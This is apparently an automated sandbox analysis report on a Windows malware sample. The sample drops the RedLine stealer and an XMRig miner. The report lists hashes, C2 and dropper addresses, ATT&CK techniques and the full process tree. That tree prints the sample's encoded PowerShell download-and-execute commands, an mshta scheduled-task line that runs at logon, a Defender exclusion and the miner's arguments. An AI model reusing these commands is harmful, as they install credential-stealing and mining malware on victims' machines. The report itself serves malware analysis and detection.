Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2023 20:56

General

  • Target

    file.exe

  • Size

    35KB

  • MD5

    a6be65f25150cadd10898e62825c5143

  • SHA1

    c1681f9c2445ac23926e0be0fa174442160260f8

  • SHA256

    3970a9fddbcbafb110f7d4fa7dc63ca5508ff32007d2ab2d89ffe54a3439c0b5

  • SHA512

    838028568077561430933d2b2a4ade7b66a4861b5f36e361445c0f5f3564b767d988eac8de94a6e57f0891328d7ef4ae1dab83a47ad8df3a93fdabb8c720c033

  • SSDEEP

    768:+FupZ04rmaAiijH46Iy4r/wOPpdwMNhghy0q9:+MLdrmaASS4kmTghy0w

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Extracted

Family

redline

Botnet

$

C2

31.41.244.135:19850

Attributes
  • auth_value

    66623f79e2af33286760f5dd6c4262dc

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "OneDrive Standalone Update Task - S - 1 - 5 - 21 - 3301851721 - 4018334294 - 377670162 - 1001" /sc ONLOGON /tr "mshta http://62.204.41.194/c.html " /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:2988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4976
      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:256
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABoAG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACIAJwApACAAPAAjAG0AeAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAbQB0AHUAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAdwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAbgB3AHEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAG8AUwBsAGUAZQBwAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBlAHEAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwBmAGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:408
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3852
  • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
    C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:528
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe "cvxjxkjice"
        3⤵
          PID:4100
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1856

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
      Filesize

      642B

      MD5

      0b4ce74a6163ae20974c8ba4fdd4f1fa

      SHA1

      3c645b8b4d9bd437e7f1f74c21304452245dba1c

      SHA256

      2267541e715084f5cda2c56fe4186d937b73a3bb8e31a5e87cdc351ab558d4e7

      SHA512

      d3dd26b2817f22f38acebe03f6487d01421dea27717ac352a03b1b4bfec990d80796458cf608aa25e932bb91cfeedd25d6ced51cf3e554fdc3a1164bc3e5805c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      66322b264b1ba997bd8eaada475d50f8

      SHA1

      c9de0fac9ce4391af563d29664700e74ac945d85

      SHA256

      987fe3f830c3e44d4847e31b2bebb3044293b0decb9a9dbbca3b6bb08fe6adb9

      SHA512

      ecf5f8b40ad201bf1ebd90153269fa56d8ccfe41ab1d30d2d9fc3b9e160b3d75d53ec65f9ce8522f51355f0691ed6250ef44bca718a53b116ae67d1128939d11

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      66322b264b1ba997bd8eaada475d50f8

      SHA1

      c9de0fac9ce4391af563d29664700e74ac945d85

      SHA256

      987fe3f830c3e44d4847e31b2bebb3044293b0decb9a9dbbca3b6bb08fe6adb9

      SHA512

      ecf5f8b40ad201bf1ebd90153269fa56d8ccfe41ab1d30d2d9fc3b9e160b3d75d53ec65f9ce8522f51355f0691ed6250ef44bca718a53b116ae67d1128939d11

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      5ff037f2338415878b68747eb68689a2

      SHA1

      00ad7f5076d8709e1ee7ec55b85ebe46a3189595

      SHA256

      369c0d76cc5c53875449b20b910a1775c0fa35664d57ba55263042523917726b

      SHA512

      d2689f918fed7f5318280d3b77db64cedd992b5f3583fd0109f7ae476bee3632cce2fffadf84a6a8e1cbd850695e038048c73874ef24b1a5a87b689acb917ac1

    • C:\Users\Admin\AppData\Roaming\NoSleep.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\NoSleep.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • memory/256-145-0x0000000000000000-mapping.dmp
    • memory/408-169-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/408-135-0x0000000000000000-mapping.dmp
    • memory/408-140-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/408-171-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/1112-177-0x0000016D4B8D0000-0x0000016D4B8E2000-memory.dmp
      Filesize

      72KB

    • memory/1112-170-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/1112-186-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/1856-185-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/1856-187-0x000001B446B90000-0x000001B446BB0000-memory.dmp
      Filesize

      128KB

    • memory/1856-188-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/1856-190-0x000001B4D9070000-0x000001B4D90B0000-memory.dmp
      Filesize

      256KB

    • memory/1856-192-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/1856-182-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/1856-184-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/1856-193-0x000001B4D9500000-0x000001B4D9520000-memory.dmp
      Filesize

      128KB

    • memory/1856-194-0x000001B4D9500000-0x000001B4D9520000-memory.dmp
      Filesize

      128KB

    • memory/1856-183-0x000000014036EAC4-mapping.dmp
    • memory/1944-151-0x0000014AD3FD0000-0x0000014AD442B000-memory.dmp
      Filesize

      4.4MB

    • memory/1944-152-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/1944-160-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/1996-153-0x0000000000000000-mapping.dmp
    • memory/1996-159-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/1996-155-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/2988-144-0x0000000000000000-mapping.dmp
    • memory/3852-168-0x0000000005560000-0x000000000559C000-memory.dmp
      Filesize

      240KB

    • memory/3852-157-0x000000000041837E-mapping.dmp
    • memory/3852-189-0x0000000006DE0000-0x0000000006DFE000-memory.dmp
      Filesize

      120KB

    • memory/3852-166-0x0000000005630000-0x000000000573A000-memory.dmp
      Filesize

      1.0MB

    • memory/3852-165-0x0000000005500000-0x0000000005512000-memory.dmp
      Filesize

      72KB

    • memory/3852-156-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/3852-172-0x00000000058D0000-0x0000000005962000-memory.dmp
      Filesize

      584KB

    • memory/3852-173-0x0000000006680000-0x0000000006C24000-memory.dmp
      Filesize

      5.6MB

    • memory/3852-174-0x00000000059E0000-0x0000000005A46000-memory.dmp
      Filesize

      408KB

    • memory/3852-175-0x0000000006E00000-0x0000000006FC2000-memory.dmp
      Filesize

      1.8MB

    • memory/3852-176-0x0000000007500000-0x0000000007A2C000-memory.dmp
      Filesize

      5.2MB

    • memory/3852-163-0x0000000005AB0000-0x00000000060C8000-memory.dmp
      Filesize

      6.1MB

    • memory/3852-178-0x0000000007460000-0x00000000074B0000-memory.dmp
      Filesize

      320KB

    • memory/3852-179-0x00000000081D0000-0x0000000008246000-memory.dmp
      Filesize

      472KB

    • memory/4100-181-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4100-191-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4100-180-0x0000020DFF2D0000-0x0000020DFF2E9000-memory.dmp
      Filesize

      100KB

    • memory/4480-142-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4480-136-0x0000000000000000-mapping.dmp
    • memory/4480-143-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4860-138-0x00000178FFFA0000-0x00000178FFFC2000-memory.dmp
      Filesize

      136KB

    • memory/4860-133-0x0000000000000000-mapping.dmp
    • memory/4860-139-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4860-164-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4912-137-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4912-132-0x0000000000650000-0x0000000000660000-memory.dmp
      Filesize

      64KB

    • memory/4976-150-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4976-141-0x00007FF80F660000-0x00007FF810121000-memory.dmp
      Filesize

      10.8MB

    • memory/4976-134-0x0000000000000000-mapping.dmp